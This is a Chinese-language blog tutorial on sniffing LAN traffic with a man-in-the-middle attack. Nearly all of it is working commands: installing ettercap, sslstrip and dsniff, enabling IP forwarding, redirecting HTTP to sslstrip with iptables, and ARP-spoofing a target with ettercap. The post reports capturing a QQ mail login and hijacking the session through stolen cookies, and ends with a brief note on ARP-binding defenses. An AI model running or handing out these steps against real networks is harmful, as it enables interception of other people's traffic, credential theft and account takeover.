實現簡單的網絡嗅探

首先聲明一下這個技術不是原創的,而且這個工具也比較老了主要是幫助大家稍微理解一下黑客在局域網中是怎么獲取數據的。首先我們來看一下程序運行的邏輯圖

Paste_Image.png

一、準備工作:

我們需要安裝幾個軟件我的環境是centos6.5
使用yum安裝:

yum -y install ettercap
yum -y install arpspoof sslstrip 
yum -y install arpspoof
yum -y install dsniff ssldump

二、開啟路由轉發

因為我們在偽裝成了路由器之后 我們需要把用戶的數據轉發到路由器,所有需要開啟我機器的路由轉發功能

echo ‘1’ > /proc/sys/net/ipv4/ip_forward   #也可以手動去修改

三、開啟iptables

通過iptableshttp數據導入到10000端口我們用sslstrip監聽10000端口并得到我們想要的數據:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
-t 表示要操作的表 nat表示修改nat表
-A 追加數據  PREROUTING路由前的鏈 追加一條規則到路由前的鏈
-p 指的是被過濾包的協議
--destination-port 80指被過濾包的目的端口是80 后面指的是將80端口的數據轉發到10000端口

四、啟動sslstrip監控10000端口

sslstrip  -l 10000

五、利用ettercap進行arp欺騙(也就是偽裝成路由器)

ettercap -T -q -M arp:remote /172.16.85.1/172.16.85.2/
-T 表示基于文本界面 因為在linux里面運行
-q  靜默模式(不回顯)
-M  啟動arp欺騙攻擊  (這一步就是偽裝路由器)

//里面填寫需要嗅探的機器IP 可以填入網段表示嗅探一個網段說有的信息
效果:

Paste_Image.png

我們登錄了qq獲取了qq郵箱的登錄賬號和密碼 但是密碼是加密的.我們只能通過下載cookie導入到自己的電腦來登錄,不能直接獲取密碼了.
下面說下防御:
Sslstrip的攻擊方式是一種中間人攻擊,需要進行arp欺騙,也就是說如果不能獲取你的數據他的工具再好也破解不到你的數據,所有我們需要設置好瀏覽器本身的安全以及需要綁定macip和網關和本機雙向綁定,或者啟動arp防火墻arp攻擊進行防御。

如果您對網絡安全和Python方面有興趣,歡迎加群 526929231進行交流學習哦!

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容